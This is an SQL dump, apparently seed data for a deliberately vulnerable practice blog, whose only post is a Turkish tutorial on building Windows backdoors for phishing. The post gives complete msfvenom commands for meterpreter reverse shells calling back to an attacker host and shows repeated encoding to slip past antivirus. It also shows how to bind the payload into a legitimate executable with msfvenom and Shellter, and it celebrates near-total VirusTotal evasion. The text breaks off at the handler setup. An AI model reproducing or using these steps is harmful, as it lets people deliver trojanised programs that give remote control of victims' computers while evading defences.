-
Notifications
You must be signed in to change notification settings - Fork 4
/
vulnourblog.sql
executable file
·178 lines (146 loc) · 76.7 KB
/
vulnourblog.sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
-- phpMyAdmin SQL Dump
-- version 4.5.4.1deb2ubuntu2
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Jan 22, 2017 at 06:02 PM
-- Server version: 5.7.17-0ubuntu0.16.04.1
-- PHP Version: 7.0.8-0ubuntu0.16.04.3
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
CREATE DATABASE cypwn_vulnourblog;
USE cypwn_vulnourblog;
--
-- Database: `cypwn_vulnourblog`
--
-- --------------------------------------------------------
--
-- Table structure for table `categories`
--
CREATE TABLE `categories` (
`category_id` int(11) NOT NULL,
`category_name` varchar(200) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `categories`
--
INSERT INTO `categories` (`category_id`, `category_name`) VALUES
(1, 'How To'),
(2, 'Walkthrough'),
(3, 'Hardenings'),
(4, 'Tips');
-- --------------------------------------------------------
--
-- Table structure for table `comments`
--
CREATE TABLE `comments` (
`comment_id` int(11) NOT NULL,
`comment_text` text CHARACTER SET latin1 NOT NULL,
`comment_email` varchar(100) CHARACTER SET latin1 NOT NULL,
`comment_username` varchar(100) CHARACTER SET latin1 NOT NULL,
`post_id` int(11) NOT NULL,
`comment_created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `posts`
--
CREATE TABLE `posts` (
`post_id` int(11) NOT NULL,
`user_id` int(11) NOT NULL,
`title` varchar(200) NOT NULL,
`text` text NOT NULL,
`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
`category_id` int(11) NOT NULL,
`photo_path` varchar(250) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `posts`
--
INSERT INTO `posts` (`post_id`, `user_id`, `title`, `text`, `created_at`, `category_id`, `photo_path`) VALUES
(1, 1, 'Backdoor Hazırlanması ve Antivirüs Bypass Edilmesi', '<h3 style="color: orange;">Backdoor (Arka Kapı) Nedir?</h3>\r\n<p>Backdoor, hedef sistem üzerinde ki güvenlik önlemlerini atlatarak, hedef sistem üzerinde uzaktan eriÅŸim hakkı kazanmayı saÄŸlayan zararlı yazılımlardır. Genellikle hedef sistemde, port açarak veya açık olan portları kullanarak saldırganın, hedef sistem üzerinde eriÅŸim hakkı kazanması saÄŸlanır. Backdoor hakkında bilgi sahibi olduÄŸumuza göre <strong>Phishing</strong> saldırılarının vazgeçilmezi olan zararlı yazılımın/dosyanın nasıl oluÅŸturulabileceÄŸini ve bu zararlı dosyanın, antivirüs ve anti-mallware programları tarafından tespitinin nasıl minimuma indirilebileceÄŸini inceleyebiliriz. Bu yazıda örnek olarak <strong>exe</strong> formatında zararlı çalışıtırılabilir dosya hazırlayacağız. Hazırlayacağımız exe, kullanıcı programı çalıştırdığında bize kullanıcının bilgisayarına eriÅŸmemizi saÄŸlayacak bir <strong>meterpreter</strong> oturumu saÄŸlayacak. Hatırlamakta fayda var ki exe formatının dışında <strong>python, asp, aspx, dll, elf</strong> gibi bir çok formatta zararlı dosya oluÅŸturma imkanı vardır. <strong style="color: orange;">msfvenom –help-formats</strong> komutu ile geri kalan formatlarıda görüntülemek mümkündür.</p>\r\n<h3 style="color: orange;">Meterpreter nedir ?</h3>\r\n<p>Meterpreter, sıklıkla kullanılan bir metasploit payloadudur. Bir arka kapı olarak çalışır. Yüklenen sistemde, sistem bilgileri, hedef sistemden ve hedef sisteme dosya transferi, hedef sistem komut satırına ulaşım gibi imkanlar saÄŸlar. Meterpreter komutlarından bir kaçına aÅŸağıdaki ekran görüntülerinden ulaÅŸabilirsiniz.</p>\r\n<p><img class="size-full wp-image-3902 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-1.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="721" height="736" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-1.png 721w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-1-294x300.png 294w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-1-50x50.png 50w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-1-60x60.png 60w" sizes="(max-width: 721px) 100vw, 721px" /></p>\r\n<p><img class="size-full wp-image-3904 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-2.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="716" height="706" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-2.png 716w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-2-300x296.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-2-80x80.png 80w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-2-50x50.png 50w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-2-60x60.png 60w" sizes="(max-width: 716px) 100vw, 716px" /></p>\r\n<p>Hızlıca bu iÅŸlemleri nasıl yapacağımıza geçelim. Ä°lk olarak içinde sadece meterpreter shell olan bir exe oluÅŸturacağız ve bu halini <a href="https://www.virustotal.com/" target="_blank">virustotalde</a> ( Virustotal, ücretsiz, küçük boyutlu yazılımlarının antivürüs programlarınca testlerini yaparak sonuçlarını veren bir servis. https://www.virustotal.com ) taratacağız.<br />\r\nÄ°lk olarak msfvenom kullanarak yapacağız. Msfvenom; metasploit framework ile birlikte gelen zararlı kod oluÅŸturmamıza yardımcı olan bir araçtır.</p>\r\n<p style="color: orange;">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f exe -o /root/Desktop/zararli1.exe</p>\r\n<p>-p : Payload<br />\r\n-f : Zararlı dosya formatı<br />\r\nLHOST : Kali IP Adresi (Local IP Adres)<br />\r\nLPORT : Kali Portu. (Zararlının bize ulaÅŸmasını saÄŸlayacak port)</p>\r\n<p>NOT: Her hangi bir linux dağıtımda yada sunucu üzerinde baÄŸlantı saÄŸlanmak istenilen portun açık olduÄŸuna dikkat edilmelidir. EÄŸer session gelmiyorsa bunun ilk nedenlerinden birisi dinlenilen portun açık olmama ihtimalidir.</p>\r\n<p><img class="size-full wp-image-3906 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-3.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="999" height="314" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-3.png 999w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-3-300x94.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-3-768x241.png 768w" sizes="(max-width: 999px) 100vw, 999px" /></p>\r\n<p>Uygulamayı virustotal de taratarak sonuçlarına bakalım.</p>\r\n<p><img class="size-full wp-image-3907 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-4.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1100" height="605" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-4.png 1100w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-4-300x165.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-4-768x422.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-4-1024x563.png 1024w" sizes="(max-width: 1100px) 100vw, 1100px" /></p>\r\n<p>Görüldüğü gibi neredeyse bütün antivirüs programları tarafından yakalandık. Bu sefer oluÅŸturacağımız zararlıyı encode ederek antivirüslerden kaçmaya çalışacağız.</p>\r\n<p><img class="size-full wp-image-3908 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-5.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="996" height="423" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-5.png 996w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-5-300x127.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-5-768x326.png 768w" sizes="(max-width: 996px) 100vw, 996px" /></p>\r\n<p> </p>\r\n<p style="color: orange;">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f exe -o /root/Desktop/zararli2.exe -k -e x86/shikata_ga_nai -i 10</p>\r\n<p>-e parametresiyle hangi encoderi kullanmasını istediÄŸimiz söylüyoruz ve -i parametresiyle kaç kez encode edileceÄŸini belirtiyoruz.<br />\r\nYine çıkan exe yi taratarak sonuçlara bakıyoruz.</p>\r\n<p><img class="size-full wp-image-3909 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-6.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1104" height="632" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-6.png 1104w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-6-300x172.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-6-768x440.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-6-1024x586.png 1024w" sizes="(max-width: 1104px) 100vw, 1104px" /></p>\r\n<p>Yakalandığımız antivirüs programı sayısında bir azalma var ama istediÄŸimiz kadar deÄŸil.<br />\r\nBirde bind etme iÅŸlemini deneyelim. Bind etmek, hali hazırda var olan bir exe nin içine zararlı kodumuzu yerleÅŸtirme olayına denir.<br />\r\nBunun için iki ayrı yöntem deneyeceÄŸim. Birincisi yukarıdaki örneklerde kullandığımız msfvenom, bir diÄŸeri ise Shellter isimli uygulama.<br />\r\nMsfvenom ile devam edelim. Öncelikle normal bir exe dosyasına ihtiyacımız var, ben tercihen kali linuxta /usr/share/windows-binaries/ içerisinde bulunan plink.exe isimli exe yi kullanacağım. Siz herhangi baÅŸka bir uygulamada seçebilirsiniz. Burada seçtiÄŸimiz uygulama bizim için sadece aracı olacak ve biz uygulamanın yanına zararlı kodumuzu koyarak yeni bir exe dosyası oluÅŸturacağız.<br />\r\nPlink.exe isimli dosyanın bir kopyasını masaüstüne setup.exe olarak kaydediyorum. Virustotal.com sitesinden uygulamayı taratıyoruz.</p>\r\n<p><img class="size-full wp-image-3911 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-7.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1049" height="592" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-7.png 1049w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-7-300x169.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-7-768x433.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-7-1024x578.png 1024w" sizes="(max-width: 1049px) 100vw, 1049px" /></p>\r\n<p>Sonuç olarak herhangi bir antivirüs programının içerisinde virüs bulduÄŸu gözüküyor. Artık ilk halini biliyoruz. Åžimdi sıra plink.exe uygulamasının içerisine zararlı kodumuzu yerleÅŸtirmeye geldi.</p>\r\n<p><img class="size-full wp-image-3912 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-8.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1092" height="448" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-8.png 1092w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-8-300x123.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-8-768x315.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-8-1024x420.png 1024w" sizes="(max-width: 1092px) 100vw, 1092px" /></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->\r\n\r\n <div id="crayon-5884af4a71c60697261441" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">\r\n \r\n <div class="crayon-toolbar" data-settings=" show" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>\r\n <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Satır Numaralarına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Düz Koda Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Satır Sarımına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Kodu GeniÅŸlet"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Kodu Yeni Pencerede Aç"><div class="crayon-button-icon"></div></div></div></div>\r\n <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>\r\n <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">\r\nmsfvenom -a x86 --platform windows -x setup.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f exe -o zararli3.exe -k -e x86/shikata_ga_nai -i 10</textarea></div>\r\n <div class="crayon-main" style="">\r\n <table class="crayon-table">\r\n <tr class="crayon-row">\r\n <td class="crayon-nums " data-settings="show">\r\n <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5884af4a71c60697261441-1">1</div></div>\r\n </td>\r\n <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5884af4a71c60697261441-1"><span class="crayon-v">msfvenom</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">a</span><span class="crayon-h"> </span><span class="crayon-v">x86</span><span class="crayon-h"> </span><span class="crayon-o">--</span><span class="crayon-e">platform </span><span class="crayon-v">windows</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">x</span><span class="crayon-h"> </span><span class="crayon-v">setup</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">k</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">p</span><span class="crayon-h"> </span><span class="crayon-v">windows</span><span class="crayon-o">/</span><span class="crayon-v">meterpreter</span><span class="crayon-o">/</span><span class="crayon-e">reverse_tcp </span><span class="crayon-v">LHOST</span><span class="crayon-o">=</span><span class="crayon-cn">192.168.56.101</span><span class="crayon-h"> </span><span class="crayon-v">LPORT</span><span class="crayon-o">=</span><span class="crayon-cn">443</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">f</span><span class="crayon-h"> </span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">o</span><span class="crayon-h"> </span><span class="crayon-v">zararli3</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-v">k</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-v">x86</span><span class="crayon-o">/</span><span class="crayon-v">shikata_ga_nai</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">i</span><span class="crayon-h"> </span><span class="crayon-cn">10</span></div></div></td>\r\n </tr>\r\n </table>\r\n </div>\r\n </div>\r\n<!-- [Format Time: 0.0014 seconds] -->\r\n<p>Ä°nternetten indirdiÄŸimiz setup.exe isimli uygulamanın yanına meterpreter shell bind ederek zararli3.exe olarak oluÅŸturduk.</p>\r\n<p><img class="size-full wp-image-3913 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-9.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1100" height="621" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-9.png 1100w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-9-300x169.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-9-768x434.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-9-1024x578.png 1024w" sizes="(max-width: 1100px) 100vw, 1100px" /></p>\r\n<p>Yakalandığımız antivürs sayısı biraz daha azalmış gözüküyor. Daha farklı encoderlar ve faklı encoderlardan sırayla exe yı geçirerek sayıyı biraz daha azaltmamız mümkün.<br />\r\nÅžimdi Shellter adlı uygulama ile bu iÅŸlemi deneyeceÄŸiz. Shellter, exe dosyalarının içerisine payload yerleÅŸtirebilmemizi saÄŸlayan ücretsiz bir araçtır.<br />\r\nShellter uygulaması kali de kurulu gelmiyor. Kurmak için :</p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->\r\n\r\n <div id="crayon-5884af4a71c6f366668482" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">\r\n \r\n <div class="crayon-toolbar" data-settings=" show" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>\r\n <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Satır Numaralarına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Düz Koda Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Satır Sarımına Geç"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Kodu GeniÅŸlet"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Kodu Yeni Pencerede Aç"><div class="crayon-button-icon"></div></div></div></div>\r\n <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>\r\n <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">\r\ndpkg --add-architecture i386 && apt-get update && apt-get install wine32 && apt-get install shellter</textarea></div>\r\n <div class="crayon-main" style="">\r\n <table class="crayon-table">\r\n <tr class="crayon-row">\r\n <td class="crayon-nums " data-settings="show">\r\n <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5884af4a71c6f366668482-1">1</div></div>\r\n </td>\r\n <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5884af4a71c6f366668482-1"><span class="crayon-v">dpkg</span><span class="crayon-h"> </span><span class="crayon-o">--</span><span class="crayon-v">add</span><span class="crayon-o">-</span><span class="crayon-e">architecture </span><span class="crayon-v">i386</span><span class="crayon-h"> </span><span class="crayon-o">&&</span><span class="crayon-h"> </span><span class="crayon-v">apt</span><span class="crayon-o">-</span><span class="crayon-e">get </span><span class="crayon-v">update</span><span class="crayon-h"> </span><span class="crayon-o">&&</span><span class="crayon-h"> </span><span class="crayon-v">apt</span><span class="crayon-o">-</span><span class="crayon-e">get </span><span class="crayon-e">install </span><span class="crayon-v">wine32</span><span class="crayon-h"> </span><span class="crayon-o">&&</span><span class="crayon-h"> </span><span class="crayon-v">apt</span><span class="crayon-o">-</span><span class="crayon-e">get </span><span class="crayon-e">install </span><span class="crayon-v">shellter</span></div></div></td>\r\n </tr>\r\n </table>\r\n </div>\r\n </div>\r\n<!-- [Format Time: 0.0007 seconds] -->\r\n<p>komutunu yazmamız yeterli olacaktır. Kurulum tamamlandıktan sonra terminale shellter yazarak programı çalıştırabiliriz.</p>\r\n<p><img class="size-full wp-image-3914 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-10.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1058" height="564" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-10.png 1058w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-10-300x160.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-10-768x409.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-10-1024x546.png 1024w" sizes="(max-width: 1058px) 100vw, 1058px" /></p>\r\n<p>Karşımıza yukarıdaki gibi bir ekran gelecektir. Choose Operation Mode sorusuna A( auto ) cevabını vererek devam ediyoruz.</p>\r\n<p><img class="size-full wp-image-3915 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-11.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1026" height="536" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-11.png 1026w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-11-300x157.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-11-768x401.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-11-1024x535.png 1024w" sizes="(max-width: 1026px) 100vw, 1026px" /></p>\r\n<p>PE Target sorduÄŸunda temiz halde bulunan exe dosyasının adresini veriyoruz. Shellter bizim için iÅŸlemleri otomatik olarak yapacaktır.</p>\r\n<p><img class="size-full wp-image-3916 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-12.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1077" height="615" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-12.png 1077w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-12-300x171.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-12-768x439.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-12-1024x585.png 1024w" sizes="(max-width: 1077px) 100vw, 1077px" /></p>\r\n<p>Bize hangi payloadı kullanmak istediÄŸimizi soruyor burada 1. seçeneÄŸi seçiyorum. Seçerken önce Local payload kullanacağımızı belirtmek için L yazıyoruz ardından 1 yazarak devam ediyoruz.</p>\r\n<p><img class="size-full wp-image-3917 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-13.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="721" height="387" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-13.png 721w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-13-300x161.png 300w" sizes="(max-width: 721px) 100vw, 721px" /></p>\r\n<p>Daha sonra bizden LHOST ve LPORT girmemizi istiyor buralara kendi ip adresimiz ve kullanmak istediÄŸimiz portu yazıyoruz.</p>\r\n<p><img class="size-full wp-image-3918 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-14.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="747" height="442" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-14.png 747w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-14-300x178.png 300w" sizes="(max-width: 747px) 100vw, 747px" /></p>\r\n<p>Daha sonra shellter geri kalan iÅŸlemleri bizim için hallediyor. Son olarak entera basmamızı istiyor ve zararlı uygulamamız hazır.</p>\r\n<p><img class="size-full wp-image-3919 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-15.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="729" height="447" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-15.png 729w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-15-300x184.png 300w" sizes="(max-width: 729px) 100vw, 729px" /></p>\r\n<p>setup.exe artık içerisinde zararlı kodlarda barındıran bir uygulama. Karışıklık olmaması için ismini zararli4.exe olarak deÄŸiÅŸtiriyorum ve ardından hemen virustotalde tarama iÅŸlemini baÅŸlatıyorum.</p>\r\n<p><img class="size-full wp-image-3920 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-16.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="1092" height="628" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-16.png 1092w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-16-300x173.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-16-768x442.png 768w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-16-1024x589.png 1024w" sizes="(max-width: 1092px) 100vw, 1092px" /></p>\r\n<p>Sonucun oldukça tatmin edici olduÄŸunu düşünüyorum. Popüler antivirüslerin hepsinden kaçmayı baÅŸardık. Ä°lk haline göre sadece bir tane antivirüs programına yakalandık.<br />\r\nOldukça baÅŸarılı sonuçlanan son uygulamadan sonra bu exe yi nasıl kullanacağımıza sıra geldi. Burada Metasploit Framework’ü kullanacağız. Terminalden msfconsole komutu ile Metasploit Framework’ü çalıştırabiliriz.</p>\r\n<p><img class="size-full wp-image-3921 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-17.png" alt="Ekran görüntüsü_2016-08-15_15-04-54" width="795" height="568" srcset="https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-17.png 795w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-17-300x214.png 300w, https://canyoupwn.me/wp-content/uploads/2016/08/Ekran-görüntüsü_2016-08-15_15-04-54-17-768x549.png 768w" sizes="(max-width: 795px) 100vw, 795px" /></p>\r\n<p style="color: orange;">use exploit/multi/handler</p>\r\n<p>komutu ile 